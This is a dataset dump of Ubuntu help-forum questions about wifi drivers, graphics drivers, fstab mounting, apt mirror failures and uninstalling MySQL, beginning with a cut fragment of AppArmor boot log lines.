1398606254.969:17 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /sbin/dhclient '' pid=1018 comm= '' apparmor_parser '' [ 42.033104 ] type=1400 audit ( 1398606254.969:18 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1018 comm= '' apparmor_parser '' [ 42.033115 ] type=1400 audit ( 1398606254.969:19 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1018 comm= '' apparmor_parser '' [ 42.034147 ] type=1400 audit ( 1398606254.969:20 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1018 comm= '' apparmor_parser '' [ 42.034157 ] type=1400 audit ( 1398606254.969:21 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1018 comm= '' apparmor_parser '' [ 42.034700 ] type=1400 audit ( 1398606254.969:22 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1018 comm= '' apparmor_parser '' [ 42.371429 ] type=1400 audit ( 1398606255.305:23 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/sbin/cups-browsed '' pid=1019 comm= '' apparmor_parser '' [ 42.379703 ] type=1400 audit ( 1398606255.313:24 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1022 comm= '' apparmor_parser '' [ 42.379725 ] type=1400 audit ( 1398606255.313:25 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=1022 comm= '' apparmor_parser '' [ 42.381050 ] type=1400 audit ( 1398606255.317:26 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=1022 comm= '' apparmor_parser '' [ 52.425610 ] init : plymouth-upstart-bridge main process ended , respawning [ 54.735414 ] audit_printk_skb : 12 callbacks suppressed [ 54.735424 ] type=1400 audit ( 1398606267.669:31 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1487 comm= '' apparmor_parser '' [ 54.735591 ] type=1400 audit ( 1398606267.669:32 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=1487 comm= '' apparmor_parser '' [ 54.737099 ] type=1400 audit ( 1398606267.673:33 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=1487 comm= '' apparmor_parser ''
456037	wifi issue : /var/log/syslog and kern.log are too huge after i installed ubuntu 14.04	freshly installed ubuntu 14.04 last week and my wifi was not working . i tried to get wifi up in vain then i started using lan as a workaround for my work . and today i noticed syslog* was more than 50g and kern.log is 15g . kern.log is full of : kernel : [ 32263.171249 ] iwl3945 0000:10:00.0 : radio disabled by hw rf kill switch syslog is full of : apr 27 19:03:55 username networkmanager [ 693 ] : dbus_g_proxy_cancel_call : assertion 'pending ! = null ' failed apr 27 19:03:55 username networkmanager [ 693 ] : < info > ( wlan0 ) : supplicant interface state : starting - > down apr 27 19:03:55 username networkmanager [ 693 ] : < warn > trying to remove a non-existant call id . apr 27 19:03:55 username wpa_supplicant [ 729 ] : could not set interface wlan0 flags ( up ) : no such device apr 27 19:03:55 username wpa_supplicant [ 729 ] : nl80211 : could not set interface 'wlan0 ' up apr 27 19:03:55 username wpa_supplicant [ 729 ] : could not set interface wlan0 flags ( up ) : no such device apr 27 19:03:55 username wpa_supplicant [ 729 ] : wext : could not set interface 'wlan0 ' up apr 27 19:03:55 username wpa_supplicant [ 729 ] : wlan0 : failed to initialize driver interface apr 27 19:03:55 username networkmanager [ 693 ] : < error > [ 1398621835.98218 ] [ nm-supplicant-interface.c:997 ] interface_add_cb ( ) : ( wlan0 ) : error adding interface : wpa_supplicant could n't grab this interface . i have disabled wifi in system setting and logs have stopped . how to deactivate/remove the problematic wifi drivers ? any help would be appreciated .
456038	intel hd 4000 in ubuntu 14.04	how can i update the intel hd 4000 in ubuntu 14.04 ? how can i enable opengl 3.3 not 3.0 ? i have the intel instaler 1.4 on but i have only opengl 3.0 opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl core profile version string : 3.3 ( core profile ) mesa 10.1.0 opengl core profile shading language version string : 3.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.0 mesa 10.1.0 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions :
456043	ati radeon hd 2400 and ubuntu 14.04 very slow	i just installed ubuntu 14.04 and everything is running very slow . after a long search in the forums and the web , i arrived to the conclusion that the problem is the graphics driver . i flowed each single instruction in the forums and nothing solved it for me . any suggestion would be very much appreciate it .
456044	how to access root folder ?	i just did a data recovery of a very important file , and it is saved in root folder automatically , and i ca n't access root folder even from gksu nautilus it gives this dialog : you do not have the permissions necessary to view the contents of ârootâ
456046	ltsp server in ubuntu	i am creating an ltsp server project in which i have ubuntu 10.04 as the os . on virtualbox , i have at least 1 client installed right now and the server itself . i installed the server using a desktop ubuntu iso image ( actually i was told to start it like that ) . i edited the /etc/network/interfaces file and gave eth0 a static ip of 192.168.18.2 and i have thought to give the two clients 192.168.18.3 and 192.168.18.4 respectively . now , when i editing the file /etc/ltsp/dhcpd.conf i do n't know what to put for the option domain-name-servers . since i do n't want to mess around with the internet of the `` school '' how should i configure the dhcpd.conf file , and what settings should i put on the network sections of virtualbox on the server and client ? if i add in another ip on that dhcpd.conf file is it going to be an ip from the same network i have been given which is 192.168.18.0/24 ? also , i was told to put the dhcp server on an interface i am not using and reboot the client ( s ) which will start internet on the client ( s ) .
456047	how to install nvidia drivers on ubuntu 14.04	i 'm trying to get ubuntu 14.04 32-bit working on an old dell dimension 4300 . i installed from a dvd and it installed fine except it was incredibly slow . i installed compiz to remove window effects but it was still horribly slow . i installed mesa-utils to test if 3d acceleration was working , which it was n't . i tried going to system - > software+updates - > additional drivers , but that says no drivers are available . i tried going to nvidia 's site for drivers and tried installing them from the terminal but i got an error complaining about rmmod 's path . i tried sudo apt-get install nvidia-311 and got a similar error . its now booting into a black screen with no user feedback . any ideas would be appreciated . thanks .
456048	sis chipset video problem	is there any release of ubuntu that will install ( and run ) on an older computer with an sis 651 integrated video chipset ? it 's a know problem on 12.10 . it does n't seem to be mentioned in any of the later release notes .
456050	installing problem at boot screen	i was installing ubuntu and after the long part i reach the boot screen and then it start loading with the ubuntu logo and it says there is a problems with /tmp and when i ignore it says i ca n't and then it says there is a problem with /tmp or /tmp need to be created . but it load to long after a hour its still loading i have 3 options i can do : press i to ignore ( dont work look above ) skip mount fix problem manuel but none of these works ! i also cant go to login screen . is this a part of the installation or is this a real problem ?
456054	unable to mount hard-disk at startup	i am trying to mount a separate hard-disk automatically before startup , and for some reason fstab is failing me . it will not boot the partition on a separate disk at startup . the partition is question is in the last entry . this is my present entry # / was on /dev/sdb1 during installation uuid=974b76b1-0d50-44af-9907-9d4a7eb5dafa / ext4 errors=remount-ro 0 1 # swap was on /dev/sdc5 during installation uuid=147dedf1-4f84-4c1f-87e9-662c51372e21 none swap sw 0 0 # data partition uuid=a14cb5de-4a9f-44bb-a59f-63c2dedc4950 /mnt/data ext4 uid=1000 , gid=1000 , umask=0022 , sync , auto , rw 0 0 i am able to mount the device with sudo /dev/sdc6 /mnt/data i am using the disk as my data drive while the os runs on an ssd . any help is appreciated .
456055	ubuntu 12.04 ' sudo apt-get update ' returns following :	i 'm using ubuntu 12.04 . 'sudo apt-get update ' ign http : //fi.archive.ubuntu.com maverick-backports release.gpg ign http : //archive.canonical.com precise release.gpg ign http : //mirrors.nic.funet.fi precise release.gpg ign http : //fi.archive.ubuntu.com maverick-backports release ign http : //archive.canonical.com precise release ign http : //archive.canonical.com precise/partner i386 packages/diffindex ign http : //archive.canonical.com precise/partner translationindex ign http : //mirrors.nic.funet.fi precise-updates release.gpg ign http : //mirrors.nic.funet.fi precise-security release.gpg ign http : //mirrors.nic.funet.fi precise-backports release.gpg ign http : //mirrors.nic.funet.fi precise-proposed release.gpg ign http : //mirrors.nic.funet.fi precise release ign http : //mirrors.nic.funet.fi precise-updates release ign http : //mirrors.nic.funet.fi precise-security release ign http : //mirrors.nic.funet.fi precise-backports release ign http : //mirrors.nic.funet.fi precise-proposed release ign http : //mirrors.nic.funet.fi precise/universe sources/diffindex ign http : //mirrors.nic.funet.fi precise/main sources/diffindex ign http : //mirrors.nic.funet.fi precise/multiverse sources/diffindex ign http : //mirrors.nic.funet.fi precise/restricted sources/diffindex ign http : //mirrors.nic.funet.fi precise/universe i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise/main i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise/multiverse i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise/restricted i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise/main translationindex ign http : //mirrors.nic.funet.fi precise/multiverse translationindex ign http : //mirrors.nic.funet.fi precise/restricted translationindex ign http : //mirrors.nic.funet.fi precise/universe translationindex ign http : //mirrors.nic.funet.fi precise-updates/universe sources/diffindex ign http : //mirrors.nic.funet.fi precise-updates/main sources/diffindex ign http : //mirrors.nic.funet.fi precise-updates/multiverse sources/diffindex ign http : //mirrors.nic.funet.fi precise-updates/restricted sources/diffindex ign http : //mirrors.nic.funet.fi precise-updates/universe i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-updates/main i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-updates/multiverse i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-updates/restricted i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-updates/main translationindex ign http : //mirrors.nic.funet.fi precise-updates/multiverse translationindex ign http : //mirrors.nic.funet.fi precise-updates/restrictedtranslationindex ign http : //mirrors.nic.funet.fi precise-updates/universe translationindex ign http : //mirrors.nic.funet.fi precise-security/universe sources/diffindex ign http : //mirrors.nic.funet.fi precise-security/main sources/diffindex ign http : //mirrors.nic.funet.fi precise-security/multiverse sources/diffindex ign http : //mirrors.nic.funet.fi precise-security/restricted sources/diffindex ign http : //mirrors.nic.funet.fi precise-security/universe i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-security/main i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-security/multiverse i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-security/restricted i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-security/main translationindex ign http : //mirrors.nic.funet.fi precise-security/multiverse translationindex ign http : //mirrors.nic.funet.fi precise-security/restricted translationindex ign http : //mirrors.nic.funet.fi precise-security/universe translationindex ign http : //mirrors.nic.funet.fi precise-backports/universe sources/diffindex ign http : //mirrors.nic.funet.fi precise-backports/main sources/diffindex ign http : //mirrors.nic.funet.fi precise-backports/multiverse sources/diffindex err http : //fi.archive.ubuntu.com maverick-backports/main sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused err http : //fi.archive.ubuntu.com maverick-backports/restricted sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused err http : //fi.archive.ubuntu.com maverick-backports/universe sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused err http : //archive.canonical.com precise/partner i386 packages 504 connect to archive.canonical.com:80 failed : connection refused err http : //fi.archive.ubuntu.com maverick-backports/multiverse sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused ign http : //mirrors.nic.funet.fi precise-backports/restricted sources/diffindex ign http : //mirrors.nic.funet.fi precise-backports/universe i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-backports/main i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-backports/multiverse i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-backports/restricted i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-backports/main translationindex ign http : //mirrors.nic.funet.fi precise-backports/multiverse translationindex ign http : //mirrors.nic.funet.fi precise-backports/restricted translationindex ign http : //mirrors.nic.funet.fi precise-backports/universe translationindex ign http : //mirrors.nic.funet.fi precise-proposed/universe sources/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/main sources/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/multiverse sources/diffindex ign http : //archive.canonical.com precise/partner translation-en_us ign http : //archive.canonical.com precise/partner translation-en ign http : //mirrors.nic.funet.fi precise-proposed/restricted sources/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/universe i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/main i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/multiverse i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/restricted i386 packages/diffindex ign http : //mirrors.nic.funet.fi precise-proposed/main translationindex ign http : //mirrors.nic.funet.fi precise-proposed/multiverse translationindex ign http : //mirrors.nic.funet.fi precise-proposed/restricted translationindex ign http : //mirrors.nic.funet.fi precise-proposed/universe translationindex err http : //mirrors.nic.funet.fi precise/universe sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/main sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/multiverse sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/restricted sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/universe i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/main i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/multiverse i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise/restricted i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused ign http : //mirrors.nic.funet.fi precise/main translation-en_us ign http : //mirrors.nic.funet.fi precise/main translation-en ign http : //mirrors.nic.funet.fi precise/multiverse translation-en_us ign http : //mirrors.nic.funet.fi precise/multiverse translation-en ign http : //mirrors.nic.funet.fi precise/restricted translation-en_us ign http : //mirrors.nic.funet.fi precise/restricted translation-en ign http : //mirrors.nic.funet.fi precise/universe translation-en_us ign http : //mirrors.nic.funet.fi precise/universe translation-en err http : //mirrors.nic.funet.fi precise-updates/universe sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/main sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/multiverse sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/restricted sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/universe i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/main i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/multiverse i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-updates/restricted i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused ign http : //mirrors.nic.funet.fi precise-updates/main translation-en_us ign http : //mirrors.nic.funet.fi precise-updates/main translation-en ign http : //mirrors.nic.funet.fi precise-updates/multiverse translation-en_us ign http : //mirrors.nic.funet.fi precise-updates/multiverse translation-en ign http : //mirrors.nic.funet.fi precise-updates/restricted translation-en_us ign http : //mirrors.nic.funet.fi precise-updates/restricted translation-en ign http : //mirrors.nic.funet.fi precise-updates/universe translation-en_us ign http : //mirrors.nic.funet.fi precise-updates/universe translation-en err http : //mirrors.nic.funet.fi precise-security/universe sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/main sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/multiverse sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/restricted sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/universe i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/main i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/multiverse i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-security/restricted i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused ign http : //mirrors.nic.funet.fi precise-security/main translation-en_us ign http : //mirrors.nic.funet.fi precise-security/main translation-en ign http : //mirrors.nic.funet.fi precise-security/multiverse translation-en_us ign http : //mirrors.nic.funet.fi precise-security/multiverse translation-en ign http : //mirrors.nic.funet.fi precise-security/restricted translation-en_us ign http : //mirrors.nic.funet.fi precise-security/restricted translation-en ign http : //mirrors.nic.funet.fi precise-security/universe translation-en_us ign http : //mirrors.nic.funet.fi precise-security/universe translation-en err http : //mirrors.nic.funet.fi precise-backports/universe sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/main sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/multiverse sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/restricted sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/universe i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/main i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/multiverse i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-backports/restricted i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused ign http : //mirrors.nic.funet.fi precise-backports/main translation-en_us ign http : //mirrors.nic.funet.fi precise-backports/main translation-en ign http : //mirrors.nic.funet.fi precise-backports/multiverse translation-en_us ign http : //mirrors.nic.funet.fi precise-backports/multiverse translation-en ign http : //mirrors.nic.funet.fi precise-backports/restricted translation-en_us ign http : //mirrors.nic.funet.fi precise-backports/restricted translation-en ign http : //mirrors.nic.funet.fi precise-backports/universe translation-en_us ign http : //mirrors.nic.funet.fi precise-backports/universe translation-en err http : //mirrors.nic.funet.fi precise-proposed/universe sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/main sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/multiverse sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/restricted sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/universe i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/main i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/multiverse i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused err http : //mirrors.nic.funet.fi precise-proposed/restricted i386 packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused ign http : //mirrors.nic.funet.fi precise-proposed/main translation-en_us ign http : //mirrors.nic.funet.fi precise-proposed/main translation-en ign http : //mirrors.nic.funet.fi precise-proposed/multiverse translation-en_us ign http : //mirrors.nic.funet.fi precise-proposed/multiverse translation-en ign http : //mirrors.nic.funet.fi precise-proposed/restricted translation-en_us ign http : //mirrors.nic.funet.fi precise-proposed/restricted translation-en ign http : //mirrors.nic.funet.fi precise-proposed/universe translation-en_us ign http : //mirrors.nic.funet.fi precise-proposed/universe translation-en /main/source/sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused w : failed to fetch http : //fi.archive.ubuntu.com/ubuntu/dists/maverick-backports/restricted/source/sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused w : failed to fetch http : //fi.archive.ubuntu.com/ubuntu/dists/maverick-backports/universe/source/sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused w : failed to fetch http : //fi.archive.ubuntu.com/ubuntu/dists/maverick-backports/multiverse/source/sources 504 connect to fi.archive.ubuntu.com:80 failed : connection refused w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/binary-i386/packages 504 connect to archive.canonical.com:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/universe/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/main/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/multiverse/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/restricted/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/universe/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/main/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/multiverse/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise/restricted/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/universe/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/main/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/multiverse/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/restricted/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/universe/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/main/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-updates/restricted/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/universe/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/main/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/multiverse/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/restricted/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/universe/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/main/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/multiverse/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-security/restricted/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/universe/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/main/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/multiverse/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/restricted/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/universe/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/main/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-backports/restricted/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/universe/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/main/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/multiverse/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/restricted/source/sources 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/universe/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/main/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/multiverse/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused w : failed to fetch http : //mirrors.nic.funet.fi/ubuntu/dists/precise-proposed/restricted/binary-i386/packages 504 connect to mirrors.nic.funet.fi:80 failed : connection refused e : some index files failed to download . they have been ignored , or old ones used instead . ping mirrors.nic.funet.fi ping mirrors.nic.funet.fi ( 193.166.3.5 ) 56 ( 84 ) bytes of data . sudo lshw | grep *-network capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless *-network description : ethernet interface capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation sudo lshw | grep wireless capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.2.0-60-generic firmware=n/a ip=192.168.100.31 latency=0 link=yes multicast=yes wireless=ieee 802.11bg
456056	displayport audio shuts off when brightness & lock setting turns screen off	i 'm using a dell u2414h monitor with displayport video/audio and a usb 3.0 hub for keyboard/mouse . when the display turns off after x minutes from the brightness & lock setting , the audio shuts off as well . the usb hub works fine , as my keyboard/mouse are plugged in there and that 's how i wake the screen . i 've only used ubuntu 14.04 with this hardware , displayport is new to me . how can i keep the audio streaming when i afk and my screen turns off ? ( monitor power button is still turned on . )
456058	unable to uninstall mysql 5.6.17 from ubuntu 12.04	i installed mysql 5.6.17 using binary file *.tar.gz . i need to remove mysql from my ubuntu system . i tried running the following commands : 1 ) sudo apt-get remove -- purge mysql-server mysql-client mysql-common 2 ) sudo apt-get autoremove 3 ) sudo apt-get autoclean 4 ) sudo deluser mysql 5 ) sudo rm -rf /var/lib/mysql when the i execute the first command nothing seems to happen . here is the output : 1 ) reading package lists ... done building dependency tree reading state information ... done package mysql-client is not installed , so not removed package mysql-common is not installed , so not removed package mysql-server is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 ) reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 ) reading package lists ... done building dependency tree reading state information ... done 4 ) removing user `mysql ' ... warning : group `mysql ' has no more members . userdel : user mysql is currently logged in /usr/sbin/deluser : `/usr/sbin/userdel mysql ' returned error code 8 . exiting . 5 ) executes . the directory is removed . i am confused as to why it says package mysql-server is not installed , so not removed . i tried other names such as mysql-server-5.6 , mysql-server-5.6.17 but nothing seems to work . can someone please help me with this ? i will really appreciate it . thanks .
